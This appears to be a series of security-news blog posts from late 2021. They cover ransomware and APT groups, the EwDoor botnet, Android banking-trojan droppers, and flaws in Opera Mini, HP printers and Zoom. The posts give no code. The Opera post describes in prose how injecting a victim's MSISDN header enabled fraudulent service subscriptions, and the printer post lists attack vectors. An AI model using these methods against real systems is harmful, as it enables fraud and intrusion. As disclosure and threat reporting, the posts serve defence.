According to a warning from Mandiant, the group previously operated under the names Arcane and Eruption and was observed last year deploying the ROLLCOAST ransomware. In September 2021, the security experts noticed a post on the exploit.in hacking forum looking for affiliates for a new ransomware operation. The activity of the new group, named 54BB47h (Sabbath), began on October 21, 2021, when the operators set up a shaming site and blog.

In October the ransomware gang infected systems at a school district in the United States and demanded a multi-million ransom.

Sabbath ransomware

Unlike other ransomware operations, Sabbath operators provide their affiliates with pre-configured Cobalt Strike BEACON backdoor payloads.

“In contrast with most other affiliate programs, Mandiant observed two occasions where the ransomware operator provided its affiliates with pre-configured Cobalt Strike BEACON backdoor payloads. While the use of BEACON is common practice in ransomware intrusions, the use of a ransom affiliate program operator provided BEACON is unusual and offers both a challenge for attribution efforts while also offering additional avenues for detection.” reads the post published by Mandiant.

The Sabbath ransomware gang has targeted critical infrastructure, including education, health, and natural resources in the United States and Canada. 

In July 2020, the UNC2190 threat actors deployed ROLLCOAST ransomware while they were branded as Eruption. Mandiant researchers found no evidence for the use of the same ransomware in 2021.

The ROLLCOAST ransomware runs in memory and checks the system language to avoid infecting Russia and other Commonwealth of Independent States member countries.

ROLLCOAST also shows similarities to Tycoon ransomware, such as the use of AES in GCM mode for encryption and an overlap between the ignored directories, files, and extensions including the ignored extension “.lolz”.

The BEACON samples and infrastructure used by both the Sabbath and Arcane ransomware affiliate services have not changed during 2021. Mandiant discovered that the ransomware operators are using the Themida packer to pack the UNC2190 BEACON malware and avoid detection.

“Although UNC2190 is a lesser known and potentially a smaller ransomware affiliate group, its smaller size and repeated rebranding has allowed it to avoid much public scrutiny.” concludes the report. “UNC2190 has continued to operate over the past year while making only minor changes to their strategies and tooling, including the introduction of a commercial packer and the rebranding of their service offering. This highlights how well-known tools, such as BEACON, can lead to impactful and lucrative incidents even when leveraged by lesser-known groups.”

Pierluigi Paganini

Play the Opera Please – Opera patches a flaw in their turbo servers

30 November 2021 at 21:24

Opera released a mini patch for a vulnerability in their turbo servers that dates back to 2018.

Prior approval was obtained from the Opera security team before disclosing this issue!

Before we get started, there are a few things we need to understand:

Value added service (VAS): a popular telecommunications term for non-core services, for example caller tunes, missed call alerts, online gaming, etc.

GGSN: the gateway GPRS support node (GGSN) is a main core-network component responsible for the interworking between the GPRS network and external packet networks; essentially it is a routing device.

HTTP header enrichment (HE Process): HTTP header enrichment is the process of adding data fields in the HTTP header. This is commonly used in mobile networks by adding user and device identifiers in HTTP requests such as IMEI, IMSI, MSISDN or other data to identify subscriber or mobile device details[1].

As per my understanding, during a VAS subscription process the GGSN picks up the MSISDN from the HTTP header to subscribe end users; the idea is to abuse the HTTP header enrichment process via the Opera Mini browser, which could lead to fraudulent VAS activation.

Why Opera Mini? Opera Mini is famous for data compression (data saving mode); it supports three data-saving modes: direct, extreme and high.

Once the request is initiated and routed by the GGSN, all communication happens over HTTPS, hence the GGSN is not aware of the source MSISDN because there is no header enrichment process: the Opera turbo server establishes a secure session to perform the rest of the process during the subscription. In this case, the GGSN acts as a routing device and fails to perform the HE process (because HE can only be performed on plain HTTP, but Opera Mini creates an HTTPS-based session).

After this, if we navigate to https://www.inputzero.io and sniff the packets with Wireshark, the source IP is our public IP and the destination is an Opera turbo server such as `global-4-lvs-hopper.opera-mini.net` rather than www.inputzero.io.

Having said that, after countless assessments of the subscription process via Opera Mini, I found one `ping` request generated by Opera Mini when it is opened for the first time after clearing the browser's cache and temp data. It was observed that this ping request is responsible for taking the MSISDN and creating the session for the entire flow.

Injecting MSISDN headers into this request with the victim's MSISDN, the session was established with the Opera turbo server using the victim's number, and now you can impersonate the victim and subscribe to any VAS service to deduct his/her digital money. With a successful subscription using the above steps and the server log, it was concluded that the Opera turbo servers don't validate/filter certain injected HTTP headers, which leads to activation of VAS services.

Patch: Opera turbo stops forwarding such injected HTTP headers, and CVE-2018-19825 was assigned to this issue, which states “Lack of filtering of certain HTTP headers could lead to fraudulent VAS activation.”

About the Author: Security Researcher Dhiraj Mishra (@mishradhiraj)

Original Post @ https://www.inputzero.io/2021/04/play-the-opera-please.html

Pierluigi Paganini

New EwDoor Botnet is targeting AT&T customers

30 November 2021 at 19:09

360 Netlab experts spotted a new botnet dubbed EwDoor that infects unpatched AT&T enterprise network edge devices.

Experts from Qihoo 360’s Network Security Research Lab discovered a new botnet, dubbed EwDoor, that targets AT&T customers using EdgeMarc Enterprise Session Border Controller (ESBC) edge devices that are publicly exposed to the Internet.

The attackers are targeting Edgewater Networks’ devices by exploiting the CVE-2017-6079 vulnerability with a relatively unique mount file system command.

“On October 27, 2021, our Botmon system identified an attacker attacking Edgewater Networks’ devices via CVE-2017-6079 with a relatively unique mount file system command in its payload, which had our attention, and after analysis, we confirmed that this was a brand new botnet, and based on its targeting of Edgewater producers and its Backdoor feature, we named it EwDoor.” reads the analysis published by Qihoo 360.

For a limited period of time the researchers were able to measure the size of the botnet through sinkholing: they noticed that EwDoor uses a backup mechanism for its C2 and registered one of the backup command-and-control (C2) domains (iunno[.]se) to analyze the connections from infected devices.

Later the EwDoor operators changed the communication model and the experts were no longer able to observe the connecting devices.

During a few hours of observation, the researchers discovered that the infected systems were EdgeMarc Enterprise Session Border Controllers used by AT&T. The experts identified 5,700 infected systems located in the US.

“By back-checking the SSL certificates used by these devices [infected devices that contacted the C2 during sinkholing], we found that there were about 100k IPs using the same SSL certificate. We are not sure how many devices corresponding to these IPs could be infected, but we can speculate that as they belong to the same class of devices the possible impact is real.” continues the report.

Researchers have identified 3 versions of the malware; the bot was mainly used to launch DDoS attacks and to establish a backdoor on infected devices to gather sensitive information, such as call logs.

The bot supports the following functions:

  • Self updating
  • Port scanning
  • File management
  • DDoS attack
  • Reverse SHELL
  • Execute arbitrary commands

EwDoor

The botnet implements a series of safeguards to hinder analysis by security experts, such as the use of TLS to prevent its communications from being intercepted, the encryption of sensitive resources to make reverse engineering harder, and moving the C2 to the cloud, with its address delivered through a BT tracker to prevent direct extraction by IoC systems.

“Modify the “ABIFLAGS” PHT in ELF to counter qemu-user and some high kernel versions of the linux sandbox. This is a relatively rare countermeasure, which shows that the author of EwDoor is very familiar with the Linux kernel, QEMU, and Edgewater devices.” continues the report.

The experts provide additional technical details on the EwDoor botnet in the report and shared indicators of compromise (IOCs) for this threat.

Pierluigi Paganini

Critical Printing Shellz flaws impact 150 HP multifunction printer models

30 November 2021 at 15:44

Researchers discovered a critical wormable buffer overflow vulnerability that affects 150 different HP multifunction printer models (MFPs).

Cybersecurity researchers from F-Secure have discovered two critical vulnerabilities, collectively tracked as Printing Shellz, that impact approximately 150 multifunction printer models.

The vulnerabilities can be exploited by attackers to take control of vulnerable devices and steal sensitive information from enterprise networks. The issues date back to 2013 and HP fixed them ([1], [2]) in November. The company acknowledged F-Secure Labs researchers Timo Hirvonen and Alexander Bolshev for reporting the vulnerabilities on April 29, 2021.

The two vulnerabilities are:

  • CVE-2021-39237 (CVSS score: 7.1) – An information disclosure vulnerability impacting certain HP LaserJet, HP LaserJet Managed, HP PageWide, and HP PageWide Managed printers.
  • CVE-2021-39238 (CVSS score: 9.3) – A buffer overflow vulnerability impacting certain HP Enterprise LaserJet, HP LaserJet Managed, HP Enterprise PageWide, and HP PageWide Managed products.

“We found multiple exploitable bugs in a HP multi-function printer (MFP). The flaws are in the unit’s communications board and font parser.” reads the FAQ published by F-Secure researchers. “An attacker can exploit them to gain code execution rights, with the former requiring physical access while the latter can be accomplished remotely. A successful attack will allow an adversary to achieve various objectives, including stealing information or using the compromised machine as a beachhead for future attacks against an organization.”

Threat actors can exploit both flaws locally via physical access to the vulnerable device, for example by printing from USB drives. Another attack scenario sees attackers printing from another device in the same network segment; in this case the threat actor uses an exploit that replicates itself to other vulnerable MFPs across the network.

Below are the attack scenarios detailed by the researchers:

  • Printing from USB drives. This is what we used during the research. In the modern firmware versions, printing from USB is disabled by default.
  • Social engineering a user into printing a malicious document. It may be possible to embed an exploit for the font-parsing vulnerabilities in a PDF. The opportunities for social engineering are endless: HR printing a CV before a job interview, a receptionist printing a boarding pass, etc.
  • Printing by connecting directly to the physical LAN port.
  • Printing from another device that is under attacker’s control and in the same network segment. This also implies that the respective flaw (CVE-2021-39238) is wormable, i.e., the exploit can be used to create a worm that replicates itself to other vulnerable MFPs across the network.
  • Cross-site printing (XSP): sending the exploit to the printer directly from the browser (by tricking a user into visiting a malicious website, for example) using an HTTP POST to JetDirect port 9100/TCP. This is probably the most attractive attack vector.
  • Direct attack via exposed UART ports that are mentioned in CVE-2021-39237, if an attacker has physical access to the device for a short period of time.

Organizations should install the patches as soon as possible, as the public disclosure of the vulnerabilities will likely trigger a wave of attacks attempting to exploit them.

Pierluigi Paganini

WIRTE APT group targets the Middle East since at least 2019

30 November 2021 at 13:57

A threat actor named WIRTE targets government, diplomatic entities, military organizations, law firms, and financial institutions in Middle East.

Cybersecurity researchers from Kaspersky have detailed the activity of a threat actor named WIRTE that is targeting government, diplomatic entities, military organizations, law firms, and financial institutions in Middle East since early 2019.

The activity of the WIRTE group was documented by cybersecurity researchers at Lab52 in 2019; the group is a politically motivated threat actor linked to the Gaza Cybergang. Other victims targeted by the group are in Armenia, Cyprus, Egypt, Jordan, Lebanon, Palestine, Syria, and Turkey.

WIRTE APT

The group launched spear-phishing campaigns using weaponized Microsoft Office documents to deploy VBS/VBA implants. The weaponized Excel documents acted as droppers that use hidden spreadsheets and VBA macros to deliver a first stage implant, which is a Visual Basic Script (VBS). The VBS implant is a script that collects system information and executes arbitrary code on the infected machine.

The first stage implant also downloads and installs a next-stage dropper named Ferocious that leverages a living-off-the-land (LotL) technique called COM hijacking to achieve persistence and execute another PowerShell script dubbed LitePower Stager.

The LitePower stager is a small PowerShell implant that acts as a downloader and secondary stager used to execute commands sent by the C2; it also allows further malware to be downloaded and deployed. The experts were able to locate C2 servers in Ukraine and Estonia.

“In our initial sample analysis, the C2 domain we observed was stgeorgebankers[.]com. After conducting pivots through malware samples, we were able to identify multiple C2 domains that date back to at least December 2019.” continues the analysis. “These C2 domains were occasionally behind CloudFlare to obscure the real C2 IP address. Thanks to collaboration with our partners, we were able to gather some of the original C2 IP addresses, which allowed us to discover that the servers are hosted in Ukraine and Estonia.”

WIRTE operators remained under the radar for a long period of time; the attacks against law firms and financial institutions represent an important shift for a politically motivated group.

“WIRTE modified their toolset and how they operate to remain stealthy for a longer period of time. Living-off-the-land (LotL) techniques are an interesting new addition to their TTPs. This suspected subgroup of Gaza Cybergang used simple yet effective methods to compromise its victims with better OpSec than its suspected counterparts. Using interpreted language malware such as VBS and PowerShell scripts, unlike the other Gaza Cybergang subgroups, adds flexibility to update their toolset and avoid static detection controls.” continues the report. “Whether WIRTE is a new subgroup or an evolution of existing Gaza Cybergang subgroups, we see them expanding their presence further in cyberspace by using updated and stealthier TTPs.”

Pierluigi Paganini

4 Android banking trojans were spread via Google Play infecting 300.000+ devices

30 November 2021 at 07:44

Experts found four Android banking trojans that were available on the official Google Play Store and that infected +300,000 devices.

Researchers from ThreatFabric discovered four distinct Android banking trojans that were spread via the official Google Play Store between August and November 2021. According to the experts, the malware infected more than 300,000 devices through multiple dropper apps.

dropper apps banking Trojan

Threat actors are refining their techniques to bypass the security checks Google applies to apps in its Play Store. One trick consists of introducing carefully planned, small malicious code updates over a longer period in Google Play. Another technique involves designing look-alike command-and-control (C2) websites that match the theme of the dropper app, so as to slip past conventional detection methods.

“To make themselves even more difficult to detect, the actors behind these dropper apps only manually activate the installation of the banking trojan on an infected device in case they desire more victims in a specific region of the world. This makes automated detection a much harder strategy to adopt by any organization.” reads the analysis published by the experts. “VirusTotal does not showcase the evolution of detections of antivirus products over time, but almost all campaigns have or had a 0/62 FUD score on VirusTotal at some point in time, confirming the difficulty of detecting dropper apps with a minimal footprint.”

The droppers were designed to distribute the Android banking trojans Anatsa, Alien, ERMAC, and Hydra.

Below is the list of dropper apps used to distribute the above banking trojans:

  • Two Factor Authenticator (com.flowdivison)
  • Protection Guard (com.protectionguard.app)
  • QR CreatorScanner (com.ready.qrscanner.mix)
  • Master Scanner Live (com.multifuction.combine.qr)
  • QR Scanner 2021 (com.qr.code.generate)
  • QR Scanner (com.qr.barqr.scangen)
  • PDF Document (com.xaviermuches.docscannerpro2)
  • Scanner – Scan to PDF
  • PDF Document Scanner (com.docscanverifier.mobile)
  • PDF Document Scanner Free (com.doscanner.mobile)
  • CryptoTracker (cryptolistapp.app.com.cryptotracker)
  • Gym and Fitness Trainer (com.gym.trainer.jeux)

ThreatFabric researchers spotted multiple samples dropped by the Brunhilda threat actor, the same group that was spotted distributing the Vultur Trojan in July 2021. In one case, the researchers observed Brunhilda posing as a QR code creator app used to drop the Hydra and Ermac malware on the devices of users in previously untapped countries, like the United States.

“In the span of only 4 months, 4 large Android families were spread via Google Play, resulting in 300.000+ infections via multiple dropper apps.” concludes the report. “A noticeable trend in the new dropper campaigns is that actors are focusing on loaders with a reduced malicious footprint in Google Play, considerably increasing the difficulties in detecting them with automation and machine learning techniques.

The small malicious footprint is a result of the new Google Play restrictions (current and planned) to put limitations on the use of privacy concerning app permissions.”

Pierluigi Paganini

Google experts found 2 flaws in video conferencing software Zoom

29 November 2021 at 22:53

Google Project Zero researchers have discovered two vulnerabilities in the video conferencing software Zoom that expose users to attacks.

Security researchers from Google Project Zero discovered two vulnerabilities in the video conferencing software Zoom that expose users to attacks. The vulnerabilities impact Zoom Client for Meetings on Windows, macOS, Linux, iOS, and Android.

The issues in the video conferencing software Zoom were discovered by Google Project Zero researcher Natalie Silvanovich. The first flaw, tracked as CVE-2021-34423, is a high-severity buffer overflow vulnerability that received a CVSS base score of 7.3.

“A buffer overflow vulnerability was discovered in the products listed in the “Affected Products” section of this bulletin. This can potentially allow a malicious actor to crash the service or application, or leverage this vulnerability to execute arbitrary code.” reads the security advisory published by Zoom.

The second vulnerability addressed by the company is a memory corruption issue, tracked as CVE-2021-34424, that received a CVSS base score of 7.3.

“A vulnerability was discovered in the products listed in the “Affected Products” section of this bulletin which potentially allowed for the exposure of the state of process memory. This issue could be used to potentially gain insight into arbitrary areas of the product’s memory.” reads the advisory.

Below is the list of affected Zoom products:

  • Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.8.4
  • Zoom Client for Meetings for Blackberry (for Android and iOS) before version 5.8.1
  • Zoom Client for Meetings for intune (for Android and iOS) before version 5.8.4
  • Zoom Client for Meetings for Chrome OS before version 5.0.1
  • Zoom Rooms for Conference Room (for Android, AndroidBali, macOS, and Windows) before version 5.8.3
  • Controllers for Zoom Rooms (for Android, iOS, and Windows) before version 5.8.3
  • Zoom VDI before version 5.8.4
  • Zoom Meeting SDK for Android before version 5.7.6.1922
  • Zoom Meeting SDK for iOS before version 5.7.6.1082
  • Zoom Meeting SDK for macOS before version 5.7.6.1340
  • Zoom Meeting SDK for Windows before version 5.7.6.1081
  • Zoom Video SDK (for Android, iOS, macOS, and Windows) before version 1.1.2
  • Zoom On-Premise Meeting Connector Controller before version 4.8.12.20211115
  • Zoom On-Premise Meeting Connector MMR before version 4.8.12.20211115
  • Zoom On-Premise Recording Connector before version 5.1.0.65.20211116
  • Zoom On-Premise Virtual Room Connector before version 4.4.7266.20211117
  • Zoom On-Premise Virtual Room Connector Load Balancer before version 2.5.5692.20211117
  • Zoom Hybrid Zproxy before version 1.0.1058.20211116
  • Zoom Hybrid MMR before version 4.6.20211116.131_x86-64

Pierluigi Paganini